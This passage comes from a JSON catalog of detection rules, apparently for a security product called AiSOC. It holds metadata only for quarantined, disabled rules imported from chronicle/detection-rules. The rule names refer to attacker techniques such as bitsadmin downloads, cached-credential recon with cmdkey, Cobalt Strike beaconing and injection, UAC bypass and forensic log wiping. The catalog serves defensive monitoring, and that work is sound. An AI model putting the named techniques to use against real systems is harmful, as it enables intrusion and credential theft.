AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "aws_user_creates_permanent_access_key", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/community/aws/cloudtrail/aws_user_creates_permanent_access_key.yaral" } }, { "id": "chronicle-detection-rules-backdoor-detection-on-sql-servers", "type": "detection", "name": "backdoor_detection_on_sql_servers", "description": "backdoor_detection_on_sql_servers", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/backdoor-detection-on-sql-servers.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "backdoor_detection_on_sql_servers", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/threat_hunting/proxy/backdoor_detection_on_sql_servers.yaral" } }, { "id": "chronicle-detection-rules-backup-catalog-deleted", "type": "detection", "name": "backup_catalog_deleted", "description": "backup_catalog_deleted", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/backup-catalog-deleted.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "backup_catalog_deleted", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/threat_hunting/windows/backup_catalog_deleted.yaral" } }, { "id": "chronicle-detection-rules-base64-encoded-powershell-command-detected", "type": "detection", "name": "base64_encoded_powershell_command_detected", "description": "base64_encoded_powershell_command_detected", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/base64-encoded-powershell-command-detected.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "base64_encoded_powershell_command_detected", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/community/microsoft/windows/base64_encoded_powershell_command_detected.yaral" } }, { "id": "chronicle-detection-rules-bazar-loader-detection-sysmon-detection", "type": "detection", "name": "bazar_loader_detection_sysmon_detection", "description": "bazar_loader_detection_sysmon_detection", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/bazar-loader-detection-sysmon-detection.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "bazar_loader_detection_sysmon_detection", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/threat_hunting/sysmon/bazar_loader_detection__sysmon_detection.yaral" } }, { "id": "chronicle-detection-rules-bcdedit-off-sysmon", "type": "detection", "name": "bcdedit_off_sysmon", "description": "bcdedit_off_sysmon", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/bcdedit-off-sysmon.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "bcdedit_off_sysmon", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/ioc_sigma/windows/bcdedit_off__sysmon.yaral" } }, { "id": "chronicle-detection-rules-betabot-neurevt-sysmon", "type": "detection", "name": "betabot_neurevt_sysmon", "description": "betabot_neurevt_sysmon", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/betabot-neurevt-sysmon.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "betabot_neurevt_sysmon", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/ioc_sigma/windows/betabot__neurevt___sysmon.yaral" } }, { "id": "chronicle-detection-rules-bits-http-client-useragent-usage", "type": "detection", "name": "bits_http_client_useragent_usage", "description": "bits_http_client_useragent_usage", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/bits-http-client-useragent-usage.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "bits_http_client_useragent_usage", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/threat_hunting/proxy/bits_http_client_user_agent_usage.yaral" } }, { "id": "chronicle-detection-rules-bitsadmin-download", "type": "detection", "name": "bitsadmin_download", "description": "bitsadmin_download", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/bitsadmin-download.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "bitsadmin_download", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/threat_hunting/process_creation/bitsadmin_download.yaral" } }, { "id": "chronicle-detection-rules-bitsadmin-download-sysmon", "type": "detection", "name": "bitsadmin_download_sysmon", "description": "bitsadmin_download_sysmon", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/bitsadmin-download-sysmon.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "bitsadmin_download_sysmon", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/ioc_sigma/windows/bitsadmin_download__sysmon.yaral" } }, { "id": "chronicle-detection-rules-blackbyte-ransomware-registry", "type": "detection", "name": "blackbyte_ransomware_registry", "description": "blackbyte_ransomware_registry", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/blackbyte-ransomware-registry.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "blackbyte_ransomware_registry", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/community/microsoft/windows/blackbyte_ransomware_registry.yaral" } }, { "id": "chronicle-detection-rules-burp-suite-scanner-and-burp-collaborator-detected-via-proxy", "type": "detection", "name": "burp_suite_scanner_and_burp_collaborator_detected_via_proxy", "description": "burp_suite_scanner_and_burp_collaborator_detected_via_proxy", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/burp-suite-scanner-and-burp-collaborator-detected-via-proxy.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "burp_suite_scanner_and_burp_collaborator_detected_via_proxy", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/ioc_sigma/proxy/burp_suite_scanner_and_burp_collaborator_detected_via_proxy.yaral" } }, { "id": "chronicle-detection-rules-cactustorch-remote-thread-creation", "type": "detection", "name": "cactustorch_remote_thread_creation", "description": "cactustorch_remote_thread_creation", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/cactustorch-remote-thread-creation.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "cactustorch_remote_thread_creation", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/threat_hunting/sysmon/cactustorch_remote_thread_creation.yaral" } }, { "id": "chronicle-detection-rules-certutil-activity-via-proxy", "type": "detection", "name": "certutil_activity_via_proxy", "description": "certutil_activity_via_proxy", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/certutil-activity-via-proxy.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "certutil_activity_via_proxy", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/threat_hunting/proxy/certutil_activity__via_proxy.yaral" } }, { "id": "chronicle-detection-rules-certutil-encode", "type": "detection", "name": "certutil_encode", "description": "certutil_encode", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/certutil-encode.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "certutil_encode", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/threat_hunting/process_creation/certutil_encode.yaral" } }, { "id": "chronicle-detection-rules-chafer-malware-url-pattern", "type": "detection", "name": "chafer_malware_url_pattern", "description": "chafer_malware_url_pattern", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/chafer-malware-url-pattern.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "chafer_malware_url_pattern", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/threat_hunting/proxy/chafer_malware_url_pattern.yaral" } }, { "id": "chronicle-detection-rules-chrome-browser-safe-browsing-user-bypass", "type": "detection", "name": "chrome_browser_safe_browsing_user_bypass", "description": "chrome_browser_safe_browsing_user_bypass", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/chrome-browser-safe-browsing-user-bypass.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "chrome_browser_safe_browsing_user_bypass", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/community/workspace/chrome_browser_safe_browsing_user_bypass.yaral" } }, { "id": "chronicle-detection-rules-citrix-netscaler-attack-cve201919781", "type": "detection", "name": "citrix_netscaler_attack_cve201919781", "description": "citrix_netscaler_attack_cve201919781", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/citrix-netscaler-attack-cve201919781.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "citrix_netscaler_attack_cve201919781", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/proactive_exploit_detection/webserver/citrix_netscaler_attack_cve_2019_19781.yaral" } }, { "id": "chronicle-detection-rules-cmdexe-launching-a-browser", "type": "detection", "name": "cmdexe_launching_a_browser", "description": "cmdexe_launching_a_browser", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/cmdexe-launching-a-browser.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "cmdexe_launching_a_browser", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/threat_hunting/process_creation/cmd_exe_launching_a_browser.yaral" } }, { "id": "chronicle-detection-rules-cmdkey-cached-credentials-recon", "type": "detection", "name": "cmdkey_cached_credentials_recon", "description": "cmdkey_cached_credentials_recon", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/cmdkey-cached-credentials-recon.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "cmdkey_cached_credentials_recon", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/threat_hunting/process_creation/cmdkey_cached_credentials_recon.yaral" } }, { "id": "chronicle-detection-rules-cmstp-uac-bypass-via-com-object-access", "type": "detection", "name": "cmstp_uac_bypass_via_com_object_access", "description": "cmstp_uac_bypass_via_com_object_access", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/cmstp-uac-bypass-via-com-object-access.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "cmstp_uac_bypass_via_com_object_access", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/threat_hunting/process_creation/cmstp_uac_bypass_via_com_object_access.yaral" } }, { "id": "chronicle-detection-rules-cmstpexe-execution-detector-sysmon-behavior", "type": "detection", "name": "cmstpexe_execution_detector_sysmon_behavior", "description": "cmstpexe_execution_detector_sysmon_behavior", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/cmstpexe-execution-detector-sysmon-behavior.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "cmstpexe_execution_detector_sysmon_behavior", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/threat_hunting/sysmon/cmstp_exe_execution_detector__sysmon_behavior.yaral" } }, { "id": "chronicle-detection-rules-cobalt-strike-dns-beaconing", "type": "detection", "name": "cobalt_strike_dns_beaconing", "description": "cobalt_strike_dns_beaconing", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/cobalt-strike-dns-beaconing.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "cobalt_strike_dns_beaconing", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/threat_hunting/dns/cobalt_strike_dns_beaconing.yaral" } }, { "id": "chronicle-detection-rules-cobaltstrike-malleable-ocsp-profile", "type": "detection", "name": "cobaltstrike_malleable_ocsp_profile", "description": "cobaltstrike_malleable_ocsp_profile", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/cobaltstrike-malleable-ocsp-profile.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "cobaltstrike_malleable_ocsp_profile", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/threat_hunting/proxy/cobaltstrike_malleable__ocsp__profile.yaral" } }, { "id": "chronicle-detection-rules-cobaltstrike-malleable-onedrive-browsing-traffic-profile", "type": "detection", "name": "cobaltstrike_malleable_onedrive_browsing_traffic_profile", "description": "cobaltstrike_malleable_onedrive_browsing_traffic_profile", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/cobaltstrike-malleable-onedrive-browsing-traffic-profile.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "cobaltstrike_malleable_onedrive_browsing_traffic_profile", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/threat_hunting/proxy/cobaltstrike_malleable_onedrive_browsing_traffic_profile.yaral" } }, { "id": "chronicle-detection-rules-cobaltstrike-process-injection", "type": "detection", "name": "cobaltstrike_process_injection", "description": "cobaltstrike_process_injection", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/cobaltstrike-process-injection.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "cobaltstrike_process_injection", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/threat_hunting/sysmon/cobaltstrike_process_injection.yaral" } }, { "id": "chronicle-detection-rules-code42-server-dll-search-order-hijack", "type": "detection", "name": "code42_server_dll_search_order_hijack", "description": "code42_server_dll_search_order_hijack", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/code42-server-dll-search-order-hijack.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "code42_server_dll_search_order_hijack", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/proactive_exploit_detection/sysmon/code42_server_dll_search_order_hijack.yaral" } }, { "id": "chronicle-detection-rules-combination-of-wevtutil-and-fsutil-to-avoid-forensics-analysis", "type": "detection", "name": "combination_of__wevtutil_and_fsutil_to_avoid_forensics_analysis", "description": "combination_of__wevtutil_and_fsutil_to_avoid_forensics_analysis", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/combination-of-wevtutil-and-fsutil-to-avoid-forensics-analysis.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "combination_of__wevtutil_and_fsutil_to_avoid_forensics_analysis", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/threat_hunting/process_creation/combination_of__wevtutil_and_fsutil_to_avoid_forensics_analysis.yaral" } }, { "id": "chronicle-detection-rules-compiled-html-file-detector-sysmon-behavior", "type": "detection", "name": "compiled_html_file_detector_sysmon_behavior", "description": "compiled_html_file_detector_sysmon_behavior", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/compiled-html-file-detector-sysmon-behavior.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "compiled_html_file_detector_sysmon_behavior", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/threat_hunting/sysmon/compiled_html_file_detector__sysmon_behavior.yaral" } }, { "id": "chronicle-detection-rules-control-panel-item-execution-detector-sysmon-behavior", "type": "detection", "name": "control_panel_item_execution_detector_sysmon_behavior", "description": "control_panel_item_execution_detector_sysmon_behavior", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/control-panel-item-execution-detector-sysmon-behavior.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "control_panel_item_execution_detector_sysmon_behavior", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/threat_hunting/sysmon/control_panel_item_execution_detector__sysmon_behavior.yaral" } }, { "id": "chronicle-detection-rules-convertto-securestring-cmdlet-usage-via-commandline", "type": "detection", "name": "convertto_securestring_cmdlet_usage_via_commandline", "description": "convertto_securestring_cmdlet_usage_via_commandline", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/convertto-securestring-cmdlet-usage-via-commandline.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "convertto_securestring_cmdlet_usage_via_commandline", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/community/microsoft/windows/convertto_securestring_cmdlet_usage_via_commandline.yaral" } }, { "id": "chronicle-detection-rules-copy-from-or-to-admin-share-or-sysvol-folder", "type": "detection", "name": "copy_from_or_to_admin_share_or_sysvol_folder", "description": "copy_from_or_to_admin_share_or_sysvol_folder", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/copy-from-or-to-admin-share-or-sysvol-folder.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "copy_from_or_to_admin_share_or_sysvol_folder", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/community/microsoft/windows/copy_from_or_to_admin_share_or_sysvol_folder.yaral" } }, { "id": "chronicle-detection-rules-covid19-phishing-campaign-fake-world-health-organization", "type": "detection", "name": "covid19_phishing_campaign_fake_world_health_organization", "description": "covid19_phishing_campaign_fake_world_health_organization", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/covid19-phishing-campaign-fake-world-health-organization.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "covid19_phishing_campaign_fake_world_health_organization", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/threat_hunting/windows/covid_19_phishing_campaign__fake_world_health_organization.yaral" } }, { "id": "chronicle-detection-rules-covid19-ransomware-detection", "type": "detection", "name": "covid19_ransomware_detection", "description": "covid19_ransomware_detection", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/covid19-ransomware-detection.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the 